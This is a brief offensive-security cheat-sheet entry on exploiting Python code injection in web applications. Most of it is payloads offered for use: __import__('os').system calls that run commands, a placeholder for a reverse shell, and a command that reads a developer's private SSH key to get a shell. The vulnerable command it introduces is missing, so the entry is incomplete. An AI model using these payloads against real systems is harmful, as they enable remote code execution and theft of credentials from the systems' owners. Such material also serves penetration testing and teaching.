Python Code Injection

Exploiting Python Code Injection in Web Applications

Suppose that you have the following command.

You may be able to insert the following payloads.

# Code execution
__import__('os').system('id')
__import__('os').system('reverse shell command,etc...')
# or sensitve information leakage
__import__('os').system('cat /home/developer/.ssh/id_rsa')

Running this shell with the code execution, you could get a shell with a developer privilege.